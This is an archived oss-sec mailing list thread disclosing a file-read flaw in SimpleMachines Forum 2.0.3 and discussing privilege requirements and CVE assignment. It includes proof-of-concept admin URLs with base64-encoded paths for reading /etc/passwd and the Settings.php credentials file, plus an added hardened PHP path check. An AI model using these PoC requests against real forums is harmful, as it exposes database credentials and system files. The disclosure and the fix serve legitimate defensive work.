oss-sec mailing list archives
Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3
From: WHK Yan <yan.uniko.102 () gmail com>
Date: Tue, 8 Jan 2013 10:36:23 -0300
The flaw is not exploitable without privileges. On some occasions there are forums where there are co-administrators which have privileges to view the error log but not to modify code or at least read the mysql connection. It has no CVE-ID.

2013/1/8 Carlos Alberto Lopez Perez <clopez () igalia com>

> On 07/01/13 15:54, WHK Yan wrote:
>> *Summary:*
>> --------------
>> A security flaw allows an attacker to know the full source file of the web system.
>>
>> *Details:*
>> -----------
>> Sources/ManageErrors.php Line 340:
>>
>>     // Make sure the file we are looking for is one they are allowed to look at
>>     if (!is_readable($file) || (strpos($file, '../') !== false && (strpos($file, $boarddir) === false || strpos($file, $sourcedir) === false)))
>>         fatal_lang_error('error_bad_file', true, array(htmlspecialchars($file)));
>>
>> Bypass function strpos($file, '../'), no need "../", example: /home/foo/www/Settings.php
>>
>> *PoC:*
>> -------
>> http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q=
>>
>> Read /etc/passwd works with path disclosure for read Settings.php:
>> http://whk.drawcoders.net/index.php/topic,2792.0.html
>>
>> *Reproduce:*
>> 1. Open http://example.com/forumpath/SSI.php?ssi_function=fetchPosts
>> 2. Get full path of web app ( /home/1337/public_html/SSI.php ).
>> 3. Exploit in base64:
>> http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2hvbWUvc3BhZG1pbi9wdWJsaWNfaHRtbC9TZXR0aW5ncy5waHA=
>> To read /home/spadmin/public_html/Settings.php
>>
>> Referer and Mirror:
>> -------------------------
>> http://whk.drawcoders.net/index.php/topic,2805.0.html
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> Hi!
>
> I have verified SMF is affected by this issue.
>
> The PoC requires an admin login to be exploited. Is there any possibility to exploit this issue without an admin login?
>
> I guess a CVE should be assigned. Did you already ask for one?
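A hardened form of the quoted check, added here as an example and not SMF's own fix: the canonical path (realpath) must sit inside $boarddir or $sourcedir, and the one file the PoC targets, Settings.php, is excluded by name. The function name is_allowed_log_file and the Settings.php exclusion are assumptions; $boarddir, $sourcedir and fatal_lang_error come from the quoted code.

```php
<?php
// Added example, not SMF's own code. Replaces the strpos('../') test with
// a canonical-path confinement: resolve the file, then require an exact
// directory prefix match, so an absolute path like /etc/passwd fails even
// though it contains no '../'.
function is_allowed_log_file($file, $boarddir, $sourcedir)
{
    // realpath() collapses '.', '..' and symlinks; false if the path does not exist.
    $real = realpath($file);
    if ($real === false || !is_file($real) || !is_readable($real))
        return false;

    // The error-log viewer never needs the DB credentials file (assumed rule,
    // added because Settings.php is the PoC's target).
    if (basename($real) === 'Settings.php')
        return false;

    foreach (array($boarddir, $sourcedir) as $dir) {
        $base = realpath($dir);
        if ($base === false)
            continue;
        // Trailing separator so '/home/foo/www-other' cannot match '/home/foo/www'.
        $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (strncmp($real, $base, strlen($base)) === 0)
            return true;
    }
    return false;
}

// Drop-in use at the quoted line 340:
// if (!is_allowed_log_file($file, $boarddir, $sourcedir))
//     fatal_lang_error('error_bad_file', true, array(htmlspecialchars($file)));

// Self-check on a constructed board directory with one source file.
$board = sys_get_temp_dir() . '/smf_board_' . getmypid();
mkdir($board);
mkdir($board . '/Sources');
file_put_contents($board . '/Sources/Load.php', "<?php\n");
file_put_contents($board . '/Settings.php', "<?php\n");
var_dump(is_allowed_log_file($board . '/Sources/Load.php', $board, $board . '/Sources'));
var_dump(is_allowed_log_file('/etc/passwd', $board, $board . '/Sources'));
var_dump(is_allowed_log_file($board . '/../../etc/passwd', $board, $board . '/Sources'));
var_dump(is_allowed_log_file($board . '/Settings.php', $board, $board . '/Sources'));
unlink($board . '/Sources/Load.php');
unlink($board . '/Settings.php');
rmdir($board . '/Sources');
rmdir($board);
```

Only the first call should return true; the absolute path, the traversal and the credentials file are all refused.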
Current thread:
- Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Carlos Alberto Lopez Perez (Jan 08)
- Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 WHK Yan (Jan 08)
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Kurt Seifried (Jan 08)
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 WHK Yan (Jan 08)
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Kurt Seifried (Jan 08)
- Message not available
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Carlos Alberto Lopez Perez (Jan 11)
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Kurt Seifried (Jan 16)
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Kurt Seifried (Jan 08)
- Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 WHK Yan (Jan 08)